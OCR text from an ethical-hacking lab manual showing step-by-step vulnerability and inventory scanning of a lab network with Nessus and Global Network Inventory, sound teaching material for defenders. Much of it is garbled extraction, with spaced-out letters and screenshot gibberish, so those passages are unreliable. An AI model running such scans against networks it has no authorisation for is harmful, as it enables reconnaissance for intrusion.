file is deprecated In addition,
prosy settings, subscription R e g is t e r in g . . .
feed registration, and offline
Successfully registered the scanner with Tenable.
updates are managed via the Successfully created the user.
GUI
| Next: Download plug!mi > |

FIGURE 10.20: Nessus Downloading Plugins

2 7 . N e s s u s w ill s t a r t f e t c h i n g t h e p l u g i n s a n d i t w ill i n s t a l l t h e m , i t w ill t a k e

tim e to in s ta ll p lu g in s a n d in itia liz a tio n

N e s s u s is f e t c h in g t h e n e w e s t p lu g in s e t

P le a a e w a it...

FIGURE 10.21: Nessus fetching the newest plugin set

2 8 . H i e Nessus Log In p a g e a p p e a r s . E n t e r t h e Usernam e a n d Passw ord

g i v e n a t t h e t i m e o f r e g i s t r a t i o n a n d c li c k Log In.

C EH Lab Manual Page 179 Ethical Hacking and Countermeasures Copyright O by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

/>.0 tc
•TASK 2

Network Scan
Vulnerabilities
nessus
I «•«‫״‬

‫׳‬ T E N A »L g
L i

Q For the item SSH user

name, enter the name of the FIGURE 10.22: The Nessus Log In screen
account that is dedicated to
Nessus on each of the scan 2 9 . T h e Nessus Hom eFeed w i n d o w a p p e a r s . C li c k OK.
target systems.

,1 / / / 1
n essu s

inn r m m i v a u u r a h m k M to llm id TBtH il lr» nanatamO » M M to

MMWuNMy i M W M u w may load 10(*iMoaAon

J m i u h (eepenew. w l oaiiUtanter any oust fton* oroigMtaAofii

M• to a PTOtoMknalFMd Subecrtpfcxi ha<•

190* -?0121)nM1 N M M s*.o r*/ nc OK I

FIGURE 10.23: Nessus HomeFeed subscription

3 0 . A f t e r y o u s u c c e s s f u l l y l o g i n , t h e Nessus Daemon w i n d o w a p p e a r s a s
s h o w n in th e fo llo w in g s c r e e n s h o t.
m To add a new policy,
dick Policies ‫ ^־־‬Add Policy.

FIGURE 10.24: The Nessus main screen

3 1 . I f y o u h a v e a n Adm inistrator Role, y o u c a n s e e d i e U sers t a b , w h i c h

li s t s a ll Users, t h e i r Roles, a n d t h e i r Last Logins.

C EH Lab Manual Page 180 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

New policies are

configured using tlie
Credentials tab.

FIGURE 10.25: The Nessus administrator view

3 2 . T o a d d a n e w p o li c y , c li c k Po licie s ‫ >־‬Add Policy. F il l i n t h e General

p o l i c y s e c t i o n s , n a m e l y , B asic, Sca n , Network Congestion, Port
Scanners, Port Sca n Options, a n d Performance.

^WARNING: Any
changes to the
Nessus scanner
configuration will
affect ALL Nessus
users. Edit these
options carefully

FIGURE 10.26: Adding Policies

3 3 . T o c o n f i g u r e d i e c r e d e n t i a l s o f n e w p o l i c y , c li c k d i e Credentials t a b
s h o w n i n t h e l e f t p a n e o f Add Policy.

C EH Lab Manual Page 181 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

m The most effective

credentials scans are those for
which the supplied credentials
have root privileges.

FIGURE 10.27: Adding Policies and setting Credentials

3 4 . T o s e l e c t t h e r e q u i r e d p l u g i n s , c li c k t h e Plugins t a b i n t h e l e f t p a n e o f
Add Policy.

P • . ‫״ ״ »׳‬

m If you are using

Kerberos, you must configure
WOWBlc/Otr!«c»
a Nessus scanner to U rir 18W8eo?1Axaunt 0+m *‫*י‬7
authenticate a KDC. O ‫יינייי‬ ‫ ין‬..‫• וי‬OCUkttO'ta•• -J’UrKlnl IoiiiiiIii«>>uII.<W
^ r» u«!j Suit#1«o!v.b O A««r«lfc**‫ ״‬ftM■*2m* L*»r>*>IknU.
OanottKdfenwct, o 1‫ עטי‬BaiHir r>KM1Su‫־‬orPar20AO.Weilmiinftwaia
(a) 0«neral
Vj GenlTOUKBlS*aj‫*׳‬yChK*» O 16TOCCHO P1W) 01Melon
y mp-uxL0 Ca Seaiftyc‫׳‬k»i O 14M0C*1tar«KTTPPra! Si f * ! Hcd Hattr RurolaDoS
Jurat UjcUSacuntyChKM <J 120MCtcdPowF.irVVal 4■, 1 ‫ו‬. uaeVjInentollB|0f. FS|

3wopn» Trie*matt tc*

f*»1Cikre TCPpoll*22 1WO.‫ז‬75‫יי***ד‬
ffj»wyUelyBialKW5 isAOioai*scrtr sc*<**nce pars
TCP.E221‫מ>׳»!יא‬1‫ ני‬W v*‫׳‬.v.e‫־‬CT.17* MtiKtAwklinsj‫ ׳‬TCP.'17814‫־*יז‬.‫)ייי*ו‬tcfirttxnUxlumg

FIGURE 10.28: Adding Policies and selecting Plugins

3 5 . T o c o n f i g u r e p r e f e r e n c e s , c li c k t h e Preferen ces t a b i n t h e l e f t p a n e o f
Add Policy.

3 6 . I n t h e Plugin f ie ld , s e l e c t Database settings f r o m t h e d r o p - d o w n lis t.

a If the policy is
successfully added, then the 3 7 . E n t e r t h e Login d e t a i l s g i v e n a t d i e t i m e o f r e g i s t r a t i o n .
Nessus server displays the
massage 3 8 . G i v e t h e D a t a b a s e S I D : 4587, D a t a b a s e p o r t t o u s e : 124, a n d s e l e c t
O r a c l e a u t l i ty p e : SY SD BA .

3 9 . C li c k Submit.

C EH Lab Manual Page 182 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11
All Rights Reserved. Reproduction is Strictly Prohibited
CD Tools
demonstrated in
this lab are
available in
D:\CEH-
Tools\CEHv8
Module 03
Scanning
Networks

FIGURE 10.29: Adding Policies and setting Preferences

4 0 . A m e s s a g e Po licy “ N etw o rk Scan _Po licy‫ ״‬w as successfu lly added

d is p la y s a s s h o w n a s f o l l o w s .

FIGURE 10.30: The NetworkScan Policy

To scan the window, 4 1 . N o w , c li c k Sca n s ‫ >־‬Add t o o p e n t h e Add Sca n w i n d o w .

input the field name, type,
policy, scan target, and target 4 2 . I n p u t t h e f i e ld Name, Type, Policy, a n d S ca n Target
file. ‘
4 3 . 111 S ca n Targets, e n t e r d i e I P a d d r e s s o f y o u r n e t w o r k ; h e r e i n t h i s l a b
w e a r e s c a n n i n g 1 0 .0 .0 .2 .

4 4 . C li c k Launch S ca n a t d i e b o t t o m - r i g h t o f t h e w i n d o w .

Note: T h e I P a d d r e s s e s m a y d i f f e r i n y o u r l a b e n v i r o n m e n t

C EH Lab Manual Page 183 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Nessus lias the ability to

save configured scan policies,
network targets, and reports
as a .nessus file.

FIGURE 10.31: Add Scan

4 5 . T h e s c a n l a u n c h e s a n d starts scanning t h e n e t w o r k .

FIGURE 10.32: Scanning in progress

S ' Tools
4 6 . A f t e r t h e s c a n is c o m p l e t e , c li c k t h e Reports ta b .
demonstrated in
this lab are
available in
D:\CEH•
Tools\CEHv8
Module 03 FIGURE 10.33: Nessus Reports tab
Scanning
4 7 . D o u b l e - c l i c k Local Network t o v i e w t h e d e t a i l e d s c a n r e p o r t .
Networks
^ ‫י‬..-*— • gMtyi
fc ■d

Bn■ B < Cvwii ' So-Mity ‫—« ״‬ ‫״׳•*־׳‬

Hm n t ■w11■1I K IN W I •M m
m tn

Z
•‫נ־י■׳‬
MUl-a* •*«-—■».»» * «Qi C«uMUrm tlmb«n rf UTMMB1 W . i■■— 1
Me
•MM•

‫<•< ז*ו‬ £[ l«v> KTT* Im i T>»•M VIWMH Wt

HM N « M < N ilr a W U IIM t W M « l W M W lK M l
HM
tMM

H9W M .»~« •Tnl *m NHHl^«ll>H|«i iW .I» UhmlUn C M * * •

•xfn H lrrt> McmcC o 1o -*« it f i LMdicr^ntarnjlutPu <» Funtut SID Ewneutan WiMom
M m x M tC o t n m k U u iu im w m m uv* no^jMren
1-01 Iftte L‫׳‬i 1»«-cruttn Un»
U B hgr r J• O aH K Qn-a• U r . riCK) SnaUU- C«M
•MO. Infe

FIGURE 10.34: Report of the scanned target

C EH Lab Manual Page 184 Ethical Hacking and Countermeasures Copyright O by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

4 8 . D o u b l e - c l i c k a n y result t o d i s p l a y a m o r e d e t a i l e d s y n o p s i s , d e s c r i p t i o n ,
s e c u r ity le v e l, a n d s o lu tio n .

Q If you are manually

creating "nessusrc" files,
there are several parameters
that can be configured to
specify SSH authentications.

FIGURE 10.35: Report of a scanned target

4 9 . C l i c k t h e Download Report b u t t o n i n t h e l e f t p a n e .

5 0 . Y o u c a n d o w n l o a d a v a il a b le r e p o r t s w i t h a .nessus e x t e n s i o n f r o m t h e
d r o p - d o w n lis t.

Download R eport X

Download Format 1

Chapters
C hap ter Selectio n N ot A llow ed

G 3 To stop Nessus server,

go to the Nessus Server
Manager and click Stop
Nessus Server button.
Cancel Subm it

FIGURE 10.36: Download Report with .nessus extension

5 1 . N o w , c li c k Log out.

5 2 . 111 t h e N e s s u s S e r v e r M a n a g e r , c li c k Stop Nessus Server.

B ‫■׳־׳‬ P ■ *6
>M a
■69■
FIGURE 10.37: Log out Nessus

L a b A n a ly s is

D o c u m e n t all d i e r e s u lts a n d r e p o r t s g a d i e r e d d u r i n g d i e la b .

C EH Lab Manual Page 185 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

T o o l/U tility I n f o r m a tio n C o lle c te d /O b je c tiv e s A c h ie v e d

S c a n T a rg e t M a c h in e : L o cal H o st

Perfo rm ed Scan P o lic y : N e t w o r k S c a n P o l i c y

N e ssu s
T arg et I P Address: 1 0 .0 .0 .2

R esult: L o c a l H o s t v u l n e r a b i l i t i e s

PL E A S E TALK T O Y O U R I N S T R U C T O R IF YOU H A V E Q U E S T I O N S
R E L A T E D T O T H I S LAB.

Q u e s t io n s

1. E v a lu a te th e O S p la tfo rm s th a t N e s s u s h a s b u ild s fo r. E v a lu a te w h e th e r
N e s s u s w o r k s w ith th e s e c u r ity c e n te r.

2. D e te r m in e h o w th e N e s s u s lic e n s e w o r k s in a V M (V ir tu a l M a c h in e )
e n v iro n m e n t.

In te rn e t C o n n e c tio n R e q u ire d

0 \ es □ No

Pla tfo rm Supported

0 C lassroom □ iL a b s

C EH Lab Manual Page 186 Ethical Hacking and Countermeasures Copyright O by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Auditing Scanning by using Global

I CON K E Y
Network Inventory
a- Valuable Global]Seh)•orkInventoryis usedasanauditscannerin ~erodeploymentand
information
agent-freeenvironments. It scansconrp!itersbyIP range, domain, con/p!itersorsingle
s Test your computers, definedbythe GlobalNetirork Inventory hostfile.
knowledge

Web exercise L a b S c e n a r io

m W orkbook review W ith th e d e v e lo p m e n t o f n e tw o rk te c h n o lo g ie s and a p p lic a tio n s , n e tw o r k

a t t a c k s a r e g r e a t l y i n c r e a s i n g b o t h i n n u m b e r a n d s e v e r ity . A t t a c k e r s a lw a y s l o o k
f o r service v u l n e r a b i l i t i e s a n d application v u l n e r a b i l i t i e s o n a n e t w o r k 01
s e r v e r s . I f a n a t t a c k e r f i n d s a f la w o r l o o p h o l e i n a s e r v i c e r u n o v e r t h e I n t e r n e t ,
t h e a t t a c k e r w ill i m m e d i a t e l y u s e t h a t t o c o m p r o m i s e t h e e n t i r e s y s t e m a n d
o th e r d a ta fo u n d , th u s he or she can c o m p ro m is e o th e r s y s te m s 0 11 th e
n e t w o r k . S im ila r ly , i f t h e a tta c k e r fin d s a w o rk s ta tio n w ith adm inistrative
privileges w i t h f a u l t s i n t h a t w o r k s t a t i o n ’s a p p l i c a t i o n s , t h e y c a n e x e c u t e a n
a rb itr a r y c o d e 0 1 im p la n t v iru s e s to in te n s ify th e d a m a g e to th e n e tw o rk .

A s a k e y te c h n iq u e in n e tw o r k s e c u r ity d o m a in , in t r u s i o n d e te c tio n s y s te m s
(ID S e s ) p la y a v ita l r o le o f d e te c tin g v a r io u s k in d s o f a tta c k s a n d s e c u r e th e
n e t w o r k s . S o , a s a n a d m i n i s t r a t o r y o u s h o u l d m a k e s u r e t h a t s e r v ic e s d o n o t r u n
a s t h e root user, a n d s h o u l d b e c a u t i o u s o f p a t c h e s a n d u p d a t e s f o r a p p l i c a t i o n s
f r o m v e n d o r s 0 1 s e c u r i t y o r g a n i z a t i o n s s u c h a s C ER T a n d CVE. S a f e g u a r d s c a n
b e im p le m e n te d s o t h a t e m a il c lie n t s o f tw a re d o e s n o t a u to m a tic a lly o p e n o r
e x e c u t e a t t a c h m e n t s . 1 1 1 t h i s l a b , y o u w ill l e a r n h o w n e t w o r k s a r e s c a n n e d u s i n g
th e G lo b a l N e t w o r k I n v e n t o r y to o l.

L a b O b j e c t iv e s

T h i s l a b w ill s h o w y o u h o w n e t w o r k s c a n b e s c a n n e d a n d h o w t o u s e G l o b a l
N e t w o r k I n v e n t o r y . I t w ill t e a c h v o u h o w to :

U s e th e G lo b a l N e tw o r k I n v e n to r y to o l

C EH Lab Manual Page 187 Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

L a b E n v ir o n m e n t

T o c a n y o u t d ie la b , y o u n e e d :
ZZ‫ ל‬Tools
demonstrated in ■ G l o b a l N e t w o r k I n v e n t o r y t o o l l o c a t e d a t D:\CEH-Tools\CEHv8 Module
this lab are 03 Scanning Networks\Scanning Tools\Global Network Inventory
available in Scanner
D:\CEH-
Tools\CEHv8 ■ Y o u c a n a ls o d o w n l o a d t h e l a t e s t v e r s i o n o f G l o b a l N e t w o r k I n v e n t o r y
Module 03 f r o m th is lin k
Scanning h t t p : / /w w w .m a g n e to s o f t.c o m /p r o d u c ts /g lo b a l n e tw o rk in v e n to r y /g n
Networks i f e a tu re s .h tm /

■ I f y o u d e c i d e t o d o w n l o a d t h e l a t e s t v e r s i o n , t h e n screenshots s h o w n
in th e la b m ig h t d iffe r

■ A c o m p u t e r r u n n i n g Windows Server 2012 a s a tt a c k e r ( h o s t m a c h i n e )

■ A n o t h e r c o m p u t e r r u n n i n g Window Server 2008 a s v ic t im (v irtu a l

m a c h in e )

■ A w e b b ro w s e r w ith I n te r n e t acc e ss

■ F o l l o w d i e w iz a r d - d r iv e n in s ta l la t io n s te p s t o in s ta ll Global Network
Inventory

■ A d m in i s t r a ti v e p r iv ile g e s t o r u n to o l s

L a b D u r a t io n

T im e : 2 0 M i n u te s

O v e r v ie w o f G lo b a l N e t w o r k In v e n t o r y

G l o b a l N e t w o r k I n v e n t o r y is o n e o f d i e de facto to o l s f o r security auditing a n d

testing o f fire w a lls a n d n e tw o r k s , i t is a ls o u s e d t o e x p lo i t Idle Scanning.

Lab T asks
task 1
1. L a u n c h t h e S ta rt m e n u b y h o v e r i n g d i e m o u s e c u r s o r i n t h e l o w e r - l e f t
Scanning the c o rn e r o f d ie d e s k to p .
network

FIGURE 11.1: Windows Server 2012 - Desktop view

2. C lic k d i e Global Network Inventory a p p t o o p e n d i e Global Network

Inventory w in d o w .

C EH Lab Manual Page 188 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Coundl
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

5 t 9 |‫־׳‬£ Administrator

Server Windows Google Hn>er.V

Manager PcrwerShell Chrome Manager

fL m * ‫וי‬
Control Hypr-V SQLServs
Panel Wtual
Machine.

Scan computers by IP
*J ■F *
Command Mozfla
range, by domain, single Prompt £11*10*
computers, or computers,
defined by the Global
£
Mww&plcm B
Network Inventory host S- Bui
Search01.. Global
file Nec»ort

PutBap © H

FIGURE 112: Windows Server 2012 - Apps

3. T l i e Global Network Inventory M a i n w i n d o w a p p e a r s a s s h o w n i n d ie

fo llo w in g fig u re .

4. T h e Tip of Day w i n d o w a ls o a p p e a r s ; c lic k Close.

& S c a n only
items that you
need by
customizing scan
elements

FIGURE 11.3 Global Network Inventory Maui Window

5. T u r n 0 1 1 Windows Server 2008 v ir tu a l m a c h i n e f r o m H v p e r - V M a n a g e r .

C EH Lab Manual Page 189 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

□ Reliable IP
detection and
identification of
network
appliances such
as network
printers,
document
centers, hubs,
and other devices

FIGURE 11.4: Windows 2008 Virtual Machine

6. N o w s w it c h b a c k t o W i n d o w s S e r v e r 2 0 1 2 m a c h i n e , a n d a n e w A u d i t
W i z a r d w i n d o w w ill a p p e a r . C lic k Next ( o r i n d i e t o o l b a r s e le c t Scan ta b
a n d c lic k Launch audit wizard).

New Audit Wizard

Welcome to the New Audit Wizard

T h s wizard will guide you through the process of creating a

n ew inventory audit.

VIEWS SCAN
RE S UL TS ,
/ NCL UD/ NC

HISTORIC
RE S UL TS
FOR ALL To continue, click Next.

SCANS,
INDIVIDUAL c Back Next > Cancel

MACHINES, FIGURE 11.5: Global Network Inventory new audit wizard

OK 7. S e le c t IP range s c a n a n d t h e n c lic k Next i n d i e Audit Scan Mode w iz a r d .
SELECTED
NUMBER OF
ADDRESSES

C EH Lab Manual Page 190 Ethical Hacking and Countermeasures Copyright O by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

New Audit Wizard

A u d it S c a n M o d e
To start a new audfc scan you must choose the scenario that best fits how you w i Is ■ (^ M
be using this scan.

O Single address scan

Choose this mode i you want to audit a single computer
Q Fully customizable (•) IP range scan
layouts and color schemes Choose this mode i you want to audit a group of computers wttwn a sr>gle IP range
on all views and reports O Domain scan
Choose this mode i you want to audit computers that are part of the same doma»1(s)
0 Host file scan
Choose this mode to a u d t computers specified in the host file The most common
scenario is to a u d t a group of computers without auditing an IP range or a domain
O Export audit agent
i
Choose this mode you want to audit computers using a domain login script.
An audit agent vwi be exported to a shared directory. It can later be used in the
domain loain scnoi.

To continue, c ic k Next.

1 < Back N®d> Cancel

______

FIGURE 11.6: Global Network Inventory Audit Scan Mode

8. S e t a il IP range s c a n a n d t h e n c lic k Next in d ie IP Range Scan w iz a r d .

Export data to HTML,

XML, Microsoft Excel, and
text formats

Licenses are network-

based rather than user-
based. In addition, extra
licenses to cover additional
addresses can be purchased 9. 111 d i e Authentication Settings w iz a r d , s e le c t Connect as a n d fill t h e
at any time if required
r e s p e c t e d c r e d e n tia ls o f y o u r Windows Server 2008 Virtual Machine, a n d
c lic k Next.

C EH Lab Manual Page 191 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

New Audit Wizard

Authentication Settings
£□ The program Specify the authentication settings to use to connect to a remote computer

comes with
dozens of OConnect as cxrrertiy logged on user
( • ) Connect as
customizable a d ^ iriS '3 (-‫•׳‬
Domain \ User name
reports. New
reports can be
Password
...........'
easily added
through the user
interface

To continue, dck Next

<Back Nert > Caned

FIGURE 11.8 Global Network Inventory Authentication settings

10. L iv e d i e s e ttin g s a s d e f a u l t a n d c lic k Finish t o c o m p l e t e d i e w iz a r d .

New Audit Wizard

Completing th e N ew Audit Wizard

(—7Ability to generate You are ready to start a new IP range scan

reports on schedule after You can set the following options for this scan:
every scan, daily, weekly, or
monthly @ Do not record unavailable nodes
@ Open scan progress dialog when scan starts

Rescan nodes that have been su ccessfJy scanned

Rescan, but no more than once a day

(§₪ T o configure reports

choose Reports |
Configure reports from
the main menu and select a
To complete this wizard, d ic k Finish.
report from a tree control
on a left. Each report can
be configured
independently <Back finah Cancel

FIGURE 11.9: Global Network Inventory final Audit wizard

11. I t d is p la y s d i e Scanning progress i n d i e Scan progress w in d o w .

C EH Lab Manual Page 192 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

iJ Scan progress

‫מ‬ Address Name Percent Tmestamp 1A

0 10.0.0.2 — E ! % 06/22/1215 38:3
1 10.0.0.3 E* 08/22/1215:36:23
2 10.0.0.4 W1N-ULY858KHQIP 852 08/22/1215:36:25
3 ‫ ו‬0.0.0.5 E !* 08/22/1215:36:23 =
4 ‫ ו‬0.0 06 AOMINPC 92*4 | 06/22/1215:36:23
5 10.0.0.7 WIN-039MR5HL9E4 92* | 06/22/1215:36:22
Q Filtering is a quick way
6 10.0.08 08/22/1215:36:23
to find a subset of data 7 10.009
! z z
08/22/1215:36 24
within a dataset. A filtered ^ z _
8 100010 06/22/1215:36 24
gnd displays only the nodes 9 100011
W
08/22/1215:36:24
that meet the criteria you
E*
10 10.0.0.12 ' E* 08/22/1215:36:24
specified for a column(s) ‫וו‬ 100013 ' E* 08/22/1215:36:24
‫ו‬2 10.0.014 I E* 06/22/1215:36:24
rtn m‫ר‬

@ Open this dialog sdien scan starts Elapsed time: 0 min 6 sec
@ Close this dialog when scan completes Scanned nodes: 0 /24

@ D o n l display completed scans

. Sl0p _ Cl°” 1/
FIGURE 11.10: Global Network Inventory Scanning Progress

12. A f t e r c o m p l e t i o n , scanning results c a n b e v ie w e d a s s h o w n i n t h e

f o llo w in g fig u re .

Globa' Network Inventory - Unregistered

Pi'v -
fie V ie w Stan Tools Reports

□]E
H elp

r BlBW talri~»EI] u *‫? י‬

a NotBlOS |A Shanes JW litergr-tn ; ^ 5‫׳‬1‫׳‬ \ Logged or
Carr^ie♦ s>«en Q PiocMMn ^ Man beard Q Memory mu Memorydeuces
Niirt ‫ז»רס‬Hotftxet |A)*tat»Syttern]rcmnaon ‫ך‬ :> H Detflcp
- MpIa■addresses mrrr . :.-‫ ז־‬Networt
$ ‫ ־‬WORKGROUP Scar M W i ^ (^p#rat:r.r |Q g !•rwit
:■I 10.0JX7 (WIN-D39...
■m 1a0JX‫(«־‬W1N-ULV8...
|Tircitamp
‫ ־י‬HoalN... ▼J Status ‫ ־י‬MAC A.. Verrfa ' 03 Mams ‫ »־‬FtoccJia ... *‫ ־‬Coimtert‫״־‬
d Doran WORKGROUP [COUNT-2)
IP A dd © « : ‘ 0.0 0.4 (C0UNT-11
T n «to ro :& 2 2 /2 0 1 2 3 36:49PM (COUNT-1)
0 Global Network ‫ »■־‬C o ro j.. |v/N LLV05(| Succcii |C0-15 5DQ01 Micro:)*Ca V irccw ; Server |
Inventory lets you change JIP A dde « .1 0 .a 0 .7 |C O U N T 1 ‫| ־‬
grid layout simply by 1Trrcj »a36. 30 3 2012‫ ״‬3 . &‫׳‬22>‫׳‬PM (C0UNT «1]
•» C«‫־‬K>j..[v/N€3SMn|Succ0M |D4‫־‬BE‫־‬D3‫־‬C'|R«rtek |lnts(Rl Co!e(fM' Serial; H2D2<
dragging column headers
using the mouse. Dropping
a header onto the
Grouping pane groups data
according to the values Tow ?Henr(t) [ r 1
stored within the
R tJu ltJfT iito ry d e p t^ L iJtu a rio rta c h a M re ^ s O isp la ye^ ro iJp ^ J^ ro u p s
"grouped" column
FIGURE 11.11: Global Network Inventory result window

13. N o w s e le c t Windows Server 2008 m a c h i n e f r o m v ie w r e s u lts t o v ie w

in d iv id u a l re s u lts .

C EH Lab Manual Page 193 Ethical Hacking and Countermeasures Copyright O by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Global Network Inventory ‫ ־‬Uniegislered l - l ° W *

Me view scan Tool( Report < Help

in - %-u110 |s^ P ig ¥ B|Q|^|a|D|B-B # ® ,

■'‫י‬-‫מ‬ ‫־‬-Loocad!s\s^ Z»: ‫ ־‬-‫ל•־‬:* B ' ‫ ״‬tens■£‫־‬Netr*of. adapter:
t* ss 3 □ 8 Port a rre d o R | System dots |^ Hot fxes 3e;jr**•certer | 3 ‫ ■׳‬Startup ■ Desktoo
N*rrc ^ Orvces 3 NetBIOS | ^ Shores L » ^cvps ^ Lbcre |J Logged cr
B ‫ י^יי‬AH addresses j| Computer yysten Q Po ;c3:cn> '•';‫ ־׳י‬bosd ^ Morer) B8
B- <* WORKGROUP Scan •unrary §, ^ 0 :.:‫־‬,:tn3 '‫ ׳‬.:ten ,ft K3
*rfcT1DC.07tV/1N-D^Tn
»• ‘‫ מ‬C J 4 ‘fw¥-ULY3‫‘״‬

& * Global Network Type ‫״‬ HoitN » SMtu: ‫י‬ MAC A * Vanda » CJS * Proceisci wCornu w r »
J Duiein * ‫׳‬o ^ e n a j p COUNT-11
Inventory grid color JIPA ddrew 10XL0.7 (COUNT =1‫ן‬
scheme is completely TncU aro: G/22/2012 3:36:38 PM (COUNT-1)
customizable. ■» C5T0J. jV/N 039MR Succe« |D4‫־‬BE D 9 C |R cakk ntsfR] Corc(TM' Send: H202!
You can change Global
Network Inventory colors
by selecting Tools | Grid
colors from main menu
and changing colors

Re»dy ^esufc^jto^jegt^oj^ca^o^oc^cdfcj^

FIGURE 11.12 Global Network Inventory Individual machine results

14. T h e Scan Summary s e c t io n g iv e s y o u a b r i e f s u m m a r y o f d i e m a c h i n e s t h a t

have been scan n ed

Global Network Inventory ‫ ־‬Unregistered 1- ‫ ^־‬r

fie VHvr Scan Tools Reports Melo

*5 ' □ ]e t 1 1^-sa a w-
▼ a x
‫ נכ‬k Mcritofj |{jjjj Logical dska ^ CX>k&tszi mo "Sntcn | j* Networx oocpteo
n 1*a □ * a y w cto i ( j S^eton dot• Hoi focce Q Socuty ccrto■ J Startup |H Dcck!op
Nam• Sn Dovcoi [# J NoifcKJS |^ Sharoe U w group( ^ U*«ra LoggoCon^
- ‫ !■ י‬A 1addrestM -: Tp-M<tyrte-r Q :■^:•;ore ^ MantcsrdJ *5 ‫י *י‬
S ‫״‬f WORKGROUP uperatmg ®]^ jan rm y Scanl#|| :.,‫ !־■=!;•׳‬Q p !=■‫| »־‬ ^ervces
^lj1CM7^iN-D^.‫־‬.‫־‬l
:■I lOiXOi’^N-ULYC"
‫ ם‬To configure
Hcs4 H.. - Status ‫ ־״‬MAC A... ‫ ■״־‬barrio- ~ O S K s rw ‫ ־י‬Prco3350r.. ‫ ״י‬Corrmert■‫״‬
results history d t ' o m a r : \ v t R r . i i - O U ‫ ׳ ־‬l .‫־‬JLrJ -‫־‬

level choose Scan ^ P 3 d * e « : IC .0 .0 : CQUNT=1J _____________________________

Id Tn rg ra « p B /2 2 ;2 P lZ 3 -3 6 ^ P M [ C D U H r = l l
| Results history | ;*» Ccnpu |WM-039VIR|S1jrowt rU-BF-D»C:|R^rri lrvel(R)Core(TM; Seiial H?‫?ר‬

level from the

main menu and
set the desired
history level
Total 4 ‫ו‬em(s) 1‫־‬ r 1‫־‬ r
^c^lt^iiitorydepthj

FIGURE 11.13: Global Inventory Scan Summary tab

15. T h e Bios s e c t i o n g iv e s d e ta ils o f B io s s e ttin g s .

C EH Lab Manual Page 194 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Global Network Inventory ‫ ־‬Unregistered 1‫ ' ־‬° ' x ‫ז‬

fit view 5tan Tools Report( Help

1^ ‫־ ז‬ SJ1'’‫ □־‬E T? |5|□ ! H i ] H5•‫״‬El & ,to

icwresufts ‫׳ייי‬ X
^ k. ‫״‬ . ■rr- q .7 : ■> f,7. . •
* 89 £ □ J5 ‫^־ד‬ Por. -annccfcrc Q System dots Hct fixes ^ Srcurti‫ ־‬ca te r 3" Startup ■ Desktop
N a rrc _ Derive* 2 MdBIOS J. Shares jscr j a n )£• 1555 |^ Lccocd or
H * P A ll addresses P Pocessots Mar :>c*od Mcrcry >*‫י‬ Memory devices
B 5 ‫ ־‬W ORKG RO UP S c ai aum anr J^ Opcra.i-1 0 Cvs.or Q fc l ‫ יי‬rent
■
fcf1M0T'(\vi‘N-639.7 ‘
{■ 10. 0. 1‫>נ* ר‬V IN -IJI Y8...
a Scan only items that
you need by customizing
scan elements

101*1‫ו‬

»U»d/ R «t u ttt h itto ry d«pth: Latt t o n fo r ta c ft a f lc r t t; Q 't p lt /« d group: All gro u p t

FIGURE 11.14: Global Network Inventory Bios summary tab

16. T l i e Memory ta b s u m m a r i z e s d i e m e m o r y i n y o u r s c a n n e d m a c h i n e .

Global Network Inventory - Unregistered

£□ E-mail
Fie View Scan Tools Reports help
address -
* • ‫ח‬ H e V i B l B & l m l H F i - ii i ®
Specifies the e- vw w r» u R < ▼ a x
■» \ M 0© coofirokn L• Mentors |g j Logical d ak s t M Oak ± n - ‫!־־־‬:•- •> Network a d ^ c n !

mail address that ** s« a □ ‫מ‬ « * I j0> tf| Operating S,‫׳‬d-• Q 1‫י»ת‬0 ‫ו׳*חווו‬ | 'J. b*r/1r*c
N am * "J* y - . ‫•■ ־ ■ ־ ־‬ c t*n o c t« ‫׳׳■)׳‬ti‫״‬ fff ■
t•5 ‫■׳‬startup |k ‫>י»»«ים‬
people should use H % A ll *d d tess e* D»ve*t [#] N *BI0S |I Shw*1 p UMfcro‫״‬ %- IIwt or
when sending e- 4 # WORKGROUP
j MwitMV f l w f «

‫*■־‬w p y ‫־‬
mail to you at this ■m I0.C .0.4 (W IN -U L Y 8 ...

account. The e-
Td a lP h ^ c d v e n w x / .M a - S a la b le H -yrea... - Total vfc u a L. ~ A v a to e V rtja ... - lo t a ...- - ftvalable..■-
mail address must d[D V .C R t 5 F 0 U P [C r M J N '= ] J

be in the format Hcsr Marre 3 9 ^ ^ ‫־‬MF 5 HL 9 E4 (C0U !\iT=1)

